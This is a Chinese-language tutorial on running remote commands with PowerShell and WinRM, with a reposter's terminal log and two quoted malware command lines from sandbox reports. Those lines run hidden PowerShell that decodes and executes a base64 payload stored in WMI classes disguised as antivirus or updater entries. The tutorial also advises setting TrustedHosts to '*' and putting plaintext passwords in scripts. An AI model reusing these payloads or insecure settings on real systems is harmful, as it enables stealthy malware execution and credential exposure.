Windows PowerShell 運行遠程命令


寫在前面

打開powershell,照貓畫虎,我這邊用自己本地機器操作的一些結果:
PS C:\Users\l00379637> Test-WSMan 10.129.0.155
Test-WSMan : <f:WSManFault xmlns:f="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" Code="2150859046" Machine="DE
SKTOP-NFBQJAR.china.huawei.com"><f:Message>WinRM 無法完成該操作。 請驗證指定的計算機名稱有效,可以通過網絡訪問該計算機
,以及啟用了 WinRM 服務的防火牆例外並允許從此計算機中進行訪問。 默認情況下,公用配置文件的 WinRM 防火牆例外僅限訪問同一
本地子網中的遠程計算機。 </f:Message></f:WSManFault>
所在位置 行:1 字符: 1
+ Test-WSMan 10.129.0.155
+ ~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (10.129.0.155:String) [Test-WSMan],InvalidOperationException
    + FullyQualifiedErrorId : WsManError,Microsoft.WSMan.Management.TestWSManCommand

==>看來是配置有問題!!!

PS C:\Users\l00379637> Enter-PSSession -ComputerName DESKTOP-NFBQJAR.china.huawei.com -Credential l003XXXX7
Enter-PSSession : 連接到遠程服務器 DESKTOP-NFBQJAR.china.huawei.com 失敗,並顯示以下錯誤消息: 客戶端無法連接到請求中指
定的目標。 請驗證該目標上的服務是否正在運行以及是否正在接受請求。 有關目標(通常是 IIS 或 WinRM)上運行的 WS 管理服務,請
查閱日志和文檔。 如果目標是 WinRM 服務,則在目標上運行以下命令來分析和配置 WinRM 服務: "winrm quickconfig"。 有關詳細信
息,請參閱 about_Remote_Troubleshooting 幫助主題。
所在位置 行:1 字符: 1
+ Enter-PSSession -ComputerName DESKTOP-NFBQJAR.china.huawei.com -Crede ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidArgument: (DESKTOP-NFBQJAR.china.huawei.com:String) [Enter-PSSession],PSRemotingT
    ransportException
    + FullyQualifiedErrorId : CreateRemoteRunspaceFailed

==》還是一樣的問題,看來配置有問題!!!


PS C:\Users\l00379637> Enable-PSRemoting -Force
WinRM 已更新為接收請求。
成功更改 WinRM 服務類型。
已啟動 WinRM 服務。

WinRM 已經進行了更新,以用於遠程管理。
WinRM 防火牆異常已啟用。

==》修改配置后,就好使了!!!

PS C:\Users\l00379637> Set-Item wsman:\localhost\client\trustedhosts *

WinRM 安全配置。
此命令修改 WinRM 客戶端的 TrustedHosts 列表。TrustedHosts
列表中的計算機可能不會經過身份驗證。該客戶端可能會向這些計算機發送憑據信息。是否確實要修改此列表?
[Y] 是(Y)  [N] 否(N)  [S] 暫停(S)  [?] 幫助 (默認值為“Y”):
PS C:\Users\l00379637> Restart-Service WinRM
警告: 正在等待服務“Windows Remote Management (WS-Management) (WinRM)”停止...
警告: 正在等待服務“Windows Remote Management (WS-Management) (WinRM)”停止...
PS C:\Users\l00379637> Test-WSMan 10.108.248.220


wsmid           : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd
ProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd
ProductVendor   : Microsoft Corporation
ProductVersion  : OS: 0.0.0 SP: 0.0 Stack: 3.0


==》一起配置OK了,試試遠程訪問。。。

PS C:\Users\l00379637> Enter-PSSession -ComputerName DESKTOP-NFBQJAR.china.huawei.com -Credential l00XXXX7
[DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents>
[DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents>
[DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents>
[DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents> echo hi
hi  ==》可以正常遠程執行命令了!!!

[DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents> exit
PS C:\Users\l00379637> Invoke-Command -ComputerName DESKTOP-NFBQJAR.china.huawei.com -Credential l00379637 -ScriptBlock { Get-Service WinRM }

Status   Name               DisplayName                            PSComputerName
------   ----               -----------                            --------------
Running  WinRM              Windows Remote Management (WS-Manag... DESKTOP-NFBQJAR.china.huawei.com

  

惡意軟件利用該命令:
https://any.run/report/164e190f90e2e87d71e3fb5b8b9d2dfd150179cec0688b26068670d91e0723ce/4aadb646-6685-41a2-b8d1-fe2d8a49dd1a  
攻擊payload:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

https://any.run/report/a9431ad6407aee17a444b61c83eaebca3cff79780daf9d456c81573bd5413984/f87664db-a20f-4e05-bdd9-fd5c3150d61a

攻擊payload:

 "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:systemcore_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:systemcore_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"

  

  

 

在 linux 中我們可以使用 SSH 執行各種遠程操作,同樣的在 windows 平台上我們可以通過 PowerShell 獲得類似的能力。本文將介紹通過 PowerShell 執行遠程操作的基本信息。想了解 SSH 遠程操作的同學,可以參考《SSH 遠程執行任務》。

基礎

MS 定義了一個叫做 WS-Management 的協議,這個協議為計算機設備遠程交換管理數據提供了一個公開的標准。在 Windows 平台上,MS 通過 Windows 遠程管理服務(Windows Remote Management service,簡稱 WinRM) 實現了 WS-Management 協議。這就是我們可以通過 PowerShell 執行遠程操作的基礎,因為 PowerShell 就是通過 WinRM 服務來進行遠程操作的。

檢查 WinRM 服務

我們可以通過下面的命令查看 WinRM 服務的狀態:

Get-Service WinRM

服務器版的 Windows 系統默認是啟動 WinRM 服務的,而普通版的系統默認則沒有啟動該服務。接下來我們將介紹如何以正確的姿勢啟動這個服務。

配置系統接受遠程命令

類似於 SSH 的客戶端/服務器架構,只需要在接受遠程命令的主機上配置 WinRM 服務就可以了。其實就是讓 WinRM 服務監聽一個端口,跟 SSH daemon 是一樣的!
用管理員權限啟動 PowerShell,執行下面的命令:

Enable-PSRemoting –Force

然后再檢查 WinRM 服務就應該是運行狀態:

或者:

防火牆規則也發生了變化:

Enable-PSRemoting 命令不僅啟動了 WinRM 服務,還幫我們設置好了防火牆規則。

如果你的計算機已經加入了域,那么上面的配置就可以了。對於沒有加入域的計算機還需要進行信任設置,然后重啟 WinRM 服務:

Set-Item wsman:\localhost\client\trustedhosts *
Restart-Service WinRM

測試遠程連接

PowerShell 還提供了一個命令用來測試遠程主機是否開啟了遠程操作服務:

Test-WsMan xxx.xxx.xxx.xxx

上面圖中的命令成功返回了,說明遠程主機上已經配置好了允許遠程訪問的服務。如果返回錯誤的消息,則說明遠程主機沒有打開遠程訪問的服務。

創建遠程連接 Session

這種方式類似於 SSH 的遠程連接。使用 SSH 客戶端建立一個到服務器的連接(session),然后執行各種操作。這是 SSH 最基本的使用方式,PowerShell 也提供了類似的支持讓我們可以做同樣的事情。

Enter-PSSession -ComputerName my-svr -Credential nickli

輸入密碼就可以建立連接了:

接下來就可以在遠程主機上執行任務了!

遠程執行單個命令

能夠在與遠程主機建立的 session 中執行任務是個很好的開始。但很多時候我們只需要簡單的執行單個命令,甚至是在腳本中執行這樣的命令,怎么辦呢?
我們可以通過 Invoke-Command 命令,並指定其 -ScriptBlock 參數完成這個任務:

Invoke-Command -ComputerName cd-lsr-svr -ScriptBlock { Get-Service WinRM } -credential nickli

執行上面的命令,並輸入用戶的密碼:

雖然命令被執行了,但缺陷也很明顯:需要用戶輸入密碼,因此無法被寫到腳本中進行自動化操作。
使用下面的方法把密碼寫到命令中(這樣就可以自動化了):

$Username = 'xxxx'
$Password = 'yyyy'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Invoke-Command -ComputerName cd-lsr-svr -ScriptBlock { Get-Service WinRM } -credential $Cred

遠程執行多個命令

有時候我們需要連續執行多個有關聯的命令,比如后一條命令會用到前一條命令的結果。此時再使用上面的方法就不行了。需要通過 session 來處理命令之間的聯系:

Invoke-Command -ComputerName myserver -ScriptBlock {$p = Get-Process PowerShell}
Invoke-Command -ComputerName myserver -ScriptBlock {$p.VirtualMemorySize}

$s = New-PSSession -ComputerName myserver
Invoke-Command -Session $s -ScriptBlock {$p = Get-Process PowerShell}
Invoke-Command -Session $s -ScriptBlock {$p.VirtualMemorySize}

當我們直接執行前兩個命令時,由於第二個命令中的 $p 沒有值,所以不能獲得結果。最后兩行的命令是通過同一個 session 執行的,所以它們可以共享變量,並最終獲得結果。

遠程執行腳本

介紹了遠程執行命令的操作,再來介紹遠程執行腳本就容易多了。其實這才是自動化工作的核心部分:

Invoke-Command -ComputerName cm-12r2 -FilePath .\task.ps1

我在本地創建了腳本文件 task.ps1,task.ps1 中的腳本創建了一個 test.txt 文件,並把 PowerShell 的版本信息添加到這個文件中。運行上面的命令:

然后在遠程機器上看有沒有文件創建:

一切看上去都很好,只不過在實際應用中我們的腳本會更復雜而已!

在多個機器上執行相同的操作

同時在多台主機上做相同的操作會成倍的提升效率,這可以遠程操作的拿手好戲:

上面圖中的命令同時在兩台遠程主機上執行,其實就是為 ComputerName 屬性指定多個目標而已!
重復一遍:真正的威力是執行腳本文件:

這次,我們同時在兩台遠程主機上執行了腳本文件 task.ps1。
如果目標主機很多,還可以把它們寫到文件中,然后通過下面的方式引用:

Invoke-Command -ComputerName (Get-Content Machines.txt)

遠程拷貝文件

終於,PowerShell 在 5.x 的版本中開始支持遠程拷貝文件了!先來看 demo:

$mySession = new-PSSession -ComputerName xxxxxx
Copy-Item -Path .\task.ps1 -Destination C:\task.ps1 -ToSession $mySession

上面的命令把本地當前目錄下的 task.ps1 文件拷貝到遠程主機 xxxxxx 的 C 盤根目錄下。注意 Copy-Item 命令使用了一個 Session 對象作為參數,這個參數的名稱為 ToSession。我們可以猜測,文件傳遞的方向就是由這個參數決定的:使用 ToSession 會把本地的文件傳遞到遠程主機;使用 FromSession 則會把遠程主機上的文件傳遞到本機。
再看一下如何拷貝整個目錄:

$mySession = new-PSSession -ComputerName xxxxxx
Copy-Item -Path .\PowerShell -Destination C:\PowerShell -ToSession $mySession -Recurse

注意目錄拷貝操作要加上 Recurse 參數。
上面的兩個操作分別是把一個文件和一個目錄拷貝到遠程的主機上,接下來我們要把遠程主機上的文件或文件夾拷貝到本機來:

$mySession = new-PSSession -ComputerName xxxxxx
Copy-Item -Path C:\task.ps1 -Destination F:\temp\task.ps1 -FromSession $mySession
Copy-Item -Path C:\PowerShell -Destination F:\temp -FromSession $mySession -Recurse

注意這里使用的參數是 FromSession,所以命令中的 Destination 指定的是本地路徑。執行上面的命令,看看是不是已經把內容拷貝到本地的 F:\temp 目錄下了!

總結

本文簡單介紹了使用 PowerShell 進行遠程操作的基礎和一些常用的使用方法。總體來說,常用的操作和 SSH 基本都是類似的。而遠程拷貝文件的命令是 PowerShell 最新的版本才支持的,在使用時一定要先確定環境中 PowerShell 的版本。

作者: sparkdev
本文版權歸作者和博客園共有,歡迎轉載,但未經作者同意必須保留此段聲明,且在文章頁面明顯位置給出原文連接,否則保留追究法律責任的權利。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM